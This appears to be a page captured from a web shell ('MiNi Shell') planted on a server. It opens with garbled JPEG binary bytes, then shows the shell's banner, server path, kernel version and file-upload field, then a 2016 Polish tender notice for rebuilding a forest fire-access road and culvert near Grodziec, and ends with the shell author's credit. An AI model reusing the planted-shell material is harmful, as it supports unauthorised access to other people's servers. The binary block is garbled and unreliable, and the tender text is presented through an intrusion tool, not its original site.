JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160624/102805-N-2016.html

<p class="kh_header"><b>Grodziec: Przebudowa drogi leśnej w Nadleśnictwie Grodziec - dojazdu pożarowego Zbiersk oraz mostka na cieku Czarna Struga (dz. 5097/1, 5079/1, 5078, 5080/1, 5063, 5081/1, 5064, 5082, 5083, 379).</b><br>
<b>Numer ogłoszenia: 102805 - 2016; data zamieszczenia: 24.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Grodziec , ul. Leśna 50, 62-580 Grodziec, woj. wielkopolskie, tel. 0-63 248-50-27, faks 0-63 248-50-05 wew. 115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grodziec.poznan.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi leśnej w Nadleśnictwie Grodziec - dojazdu pożarowego Zbiersk oraz mostka na cieku Czarna Struga (dz. 5097/1, 5079/1, 5078, 5080/1, 5063, 5081/1, 5064, 5082, 5083, 379)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane pn. Przebudowa drogi leśnej w 	Nadleśnictwie Grodziec - dojazdu pożarowego Zbiersk oraz mostka na cieku Czarna 	Struga (dz. 5097/1, 5079/1, 5078, 5080/1, 5063, 5081/1, 5064, 5082, 5083, 379). 	Roboty budowlane polegają na przebudowie drogi leśnej z przeznaczeniem na dojazd 	pożarowy w klasie drogi wewnątrzzakładowej z następującymi elementami: przebudowa 	istniejących mijanek , oczyszczenie i pogłębienie istniejących rowów, przebudowa 	istniejących zjazdów, przebudowa istniejących placów składowych. Całkowita długość 	przebudowy drogi leśnej 	wynosi 3072,73 m. W ciągu drogi przewiduje się przebudowę 	mostka na cieku wodnym Czarna Struga polegającą na wbudowaniu przepustu 	prefabrykowanego 	HelCor.
W ramach wykonywania niniejszego zamówienia Wykonawca zobowiązany jest do dokonywania uzgodnień z zarządcą dróg. Wymagania w tym zakresie zostały określone w Decyzji Zarządu Powiatu Kaliskiego z dnia 16-01-2015 roku zn. spr. DR.673.3.1.2015.

Szacunkowa wartość zamówienia nie przekracza wyrażonej w złotych równowartości kwoty 5 225 000,00 euro..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.30.00-9, 45.10.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta powinna być zabezpieczona wadium w wysokości - 40.800,00  zł 	(słownie: 	czterdzieści tysięcy  osiemset zł  00/100 ); 
2. Wadium może być wniesione w następujących formach, w zależności od wyboru 	Wykonawcy:
a)	w pieniądzu, wpłaconym przelewem na rachunek bankowy Zamawiającego: 
BANK ZACHODNI WBK S.A   55109011990000000107656115 z wpisem na dowodzie wpłaty -Wadium na zabezpieczenie oferty przetargowej - Przebudowa drogi leśnej w Nadleśnictwie Grodziec - dojazdu pożarowego Zbiersk oraz mostka na cieku Czarna Struga (dz. 5097/1, 5079/1, 5078, 5080/1, 5063, 5081/1, 5064, 5082, 5083, 379). Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty (wadium w formie gotówki nie będzie przyjmowane!),
Wadium w formie pieniężnej uznaje się za wniesione z chwilą jego wpływu na wskazany rachunek bankowy Zamawiającego.
b)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	w gwarancjach bankowych;
d)	w gwarancjach ubezpieczeniowych;
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz.U. z 2007r., Nr 42, poz. 275 z późn. zmianami).
	Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie Zamawiającego  do godz. 1030 do dnia  12-07-2016 roku. Natomiast do oferty należy załączyć potwierdzoną za zgodność z oryginałem kserokopię.  
3. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób 	reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego 	(upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony 
	w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką 	lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać 	bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w 	terminie 	związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty 	wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień 	publicznych.  
4. W przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających 	się o udzielenie niniejszego zamówienia wadium w swej treści winno zawierać wyraźne wskazanie wszystkich Wykonawców 	tworzących konsorcjum (wspólnie ubiegających się o udzielenie zamówienia) tj. wraz z podaniem ich nazw i siedzib.
	W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego 	zamówienia wadium może być wniesione przez Pełnomocnika Wykonawców.
	8.5. Wadium należy wnieść w terminie do dnia 12-07-2016 roku do godz. 1030. 
	W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje 	się moment uznania rachunku Zamawiającego. 
	8.6. Wadium musi obejmować cały okres związania ofertą.
	8.7. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku 	bankowym. 
	8.8. Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą 	wadium 	zostanie wykluczony z postępowania.
	8.9. Szczegółowe informacje dotyczące zwrotu i zatrzymania wadium zostały 	zawarte 	w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia 	warunków w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w 	tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału 	w 	postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki , o 	których mowa w art. 22 ust. 1 upzp, dotyczące w szczególności posiadania wiedzy i 	doświadczenia.
	Warunek ten zostanie spełniony jeżeli Wykonawca wykaże że w okresie 	ostatnich 5 lat 	przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 	krótszy - w tym okresie wykonał w sposób należyty, zgodnie z zasadami sztuki 	budowlanej i prawidłowo ukończył co najmniej trzy roboty drogowe w zakresie 	wykonania nawierzchni żwirowych lub tłuczniowych z wykorzystaniem przepustów o 	średnicy minimum 1500 mm o wartościach (brutto)  nie mniejszych niż 600 000,00 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże w celu realizacji zamówienia 	narzędzia, wyposażenie zakładu i urządzenia techniczne wymienione poniżej:
- samochody samowyładowcze ładowności 10 - 27 ton min. 5 szt,
- równiarka do wbudowania dostarczonego kruszywa oraz profilowania dróg,
- walec wibracyjny samojezdny min. 7,5 t, lub zamienny zespół sprzętowy w różnych konfiguracjach uzupełniających się wzajemnie o zbliżonych wielkościach, mocy i parametrach umożliwiających realizację zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, legitymujące się kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do funkcji , jakie zostaną im powierzone. Wykonawca na każdą funkcję wymienioną poniżej, wskaże osobę, która spełnia następujące wymagania:
	- osoba proponowana do pełnienia funkcji Kierownika Robót - 1 osoba (minimalne 	kwalifikacje zawodowe to posiadanie ważnych uprawnień budowlanych 	wykonawczych 	bez ograniczeń do kierowania robotami budowlanymi w specjalności inżynieryjnej 	drogowej.
	Osoba wskazana na stanowisko Kierownika Robót winna posiadać uprawnienia 	budowlane do kierowania robotami zgodnie z ustawą Prawo Budowlane w specjalności 	właściwej dla powierzanego stanowiska lub odpowiadające im ważne uprawnienia 	budowlane, które zostały wydane na podstawie wcześniejszych przepisów - w 	przypadku gdy są wymagane odrębnymi przepisami obowiązującymi w danym kraju.
	- osoba proponowana do pełnienia funkcji Majstra Robót - 1 osoba (minimalne 	kwalifikacje zawodowe posiadanie wykształcenia średniego technicznego lub 	minimum 	zasadniczego oraz trzyletnie doświadczenie w zakresie robót drogowych).
	Zamawiający nie dopuszcza przedstawienia tej samej osoby do pełnienia więcej 	niż jednej funkcji z wymienionych powyżej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania 	warunków w tym zakresie. Zamawiający dokona oceny spełnienia warunków 	udziału 	w postępowaniu w tym zakresie na podstawie Oświadczenia o spełnianiu 	warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 91</li>
<li>2 - gwarancja jakości 44 m-cy -3pkt, 52 m-ce-6 pkt, 60 m-cy - 9pkt - 9</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń: 
1.Wystąpienia zmian powszechnie obowiązujących przepisów prawa 	w zakresie mającym wpływ na realizację przedmiotu umowy. 
2.Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych 	w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać 	usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej 	interpretacji 	jej zapisów przez strony. 
3. Wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, 	choroba, 	ustania stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne 	od Wykonawcy), przy pomocy których Wykonawca realizuje przedmiot 	umowy. 	Przedmiotowa zmiana jest możliwa pod warunkiem zaproponowania innych osób, 	spełniających na dzień składania ofert, warunki określone przez Zamawiającego 	w SIWZ.
4. Wystąpienia konieczności wprowadzenia zmian spowodowanych 	następującymi 	okolicznościami:
4.1.siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie 	ze szczegółowym opisem; 
4.2. zmiana danych związanych z obsługą administracyjno-organizacyjną 	umowy 	(np. zmiana nr rachunku bankowego); 
4.3. zmiany danych teleadresowych;
4.4. zmiana obowiązującej stawki VAT; 
4.5. rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. 
5. Wydłużenie terminu wykonania zamówienia o czas równoważny czasowi 	wystąpienia okoliczności wyszczególnionych poniżej: 
5.1. w przypadku powstania wyjątkowo niesprzyjających warunków atmosferycznych 	uniemożliwiających prowadzenie robót, 
5.2. w przypadku okresowego wstrzymania robót przez Zamawiającego;	
6. W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt. 	4. 	oraz pkt. 5. termin realizacji przedmiotu umowy może ulec 	odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania 	jej 	przedmiotu 	w sposób należyty, nie dłużej jednak niż o okres trwania tych 	okoliczności. 
7. Pozostałe zmiany zostały określone w umowie. 
8. Wszelkie zmiany do  umowy wymagają pisemnego aneksu podpisanego 	przez 	strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.grodziec.poznan.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Nadleśnictwa Grodziec
ul. Leśna 50
62-580 Grodziec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2016 godzina 10:30, miejsce: sekretariat pokój nr 1
ul. Leśna 50
62-580 Grodziec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com